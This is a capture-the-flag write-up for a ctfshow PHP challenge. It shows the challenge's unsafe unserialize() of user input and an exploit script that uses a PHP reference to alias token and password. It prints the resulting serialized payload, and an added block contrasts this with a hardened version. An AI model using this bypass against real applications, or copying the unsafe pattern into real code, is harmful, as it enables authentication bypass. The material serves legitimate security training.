Source code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-04 23:52:24
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;
    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}
$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());
if($ctfshow->login()){
    echo $flag;
}
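Approach
We only need password to be strictly equal (===) to token. However, token is the MD5 hash of a random number, so brute-forcing it is very hard. Here we can use a PHP reference, which is similar to a pointer in C: once password refers to the same value as token, the later assignment to token changes both and login() returns true. I happened to do a similar challenge on BUU in the past few days.
Solution
exp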
<?php
class ctfshowAdmin{
    public $token;
    public $password;
    // public function __construct($t,$p){
    //     $this->token=$t;
    //     $this->password = $p;
    // }
    // public function login(){
    //     return $this->token===$this->password;
    // }
}
$a = new ctfshowAdmin;
$a->password = &$a->token;
echo urlencode(serialize($a));
//O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";R:2;}
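The aliasing behaviour described above, next to a hardened form of the same check. This is an added example, not part of the challenge or the original write-up: challengeLogin() wraps the challenge's logic in a function, while safeLogin() and its JSON input format are hypothetical.

```php
<?php
// Added example, not the challenge's code. safeLogin() and its JSON input
// format are hypothetical; the payload is the one printed by the exp above.
class ctfshowAdmin {
    public $token;
    public $password;
    public function login() {
        return $this->token === $this->password;
    }
}

// Pattern from the challenge: the server writes its secret into an object
// built by unserialize(). "R:2" makes password an alias of slot 2 (token),
// so the assignment below updates both properties at once.
function challengeLogin(string $serialized): bool {
    $obj = unserialize($serialized);
    $obj->token = md5(mt_rand());
    return $obj->login();
}

// Hardened form: parse plain data with json_decode() (no objects, no
// references), keep the token in a local variable the input cannot alias,
// and compare with hash_equals().
function safeLogin(string $json): bool {
    $in = json_decode($json, true);
    if (!is_array($in) || !is_string($in['password'] ?? null)) {
        return false;
    }
    $token = md5((string) random_int(0, PHP_INT_MAX));
    return hash_equals($token, $in['password']);
}

$payload = 'O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";R:2;}';
var_dump(challengeLogin($payload));                     // aliased object
var_dump(safeLogin('{"token":null,"password":null}'));  // non-string password
var_dump(safeLogin('{"password":"guess"}'));            // constructed sample input
```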
Summary
An easy challenge.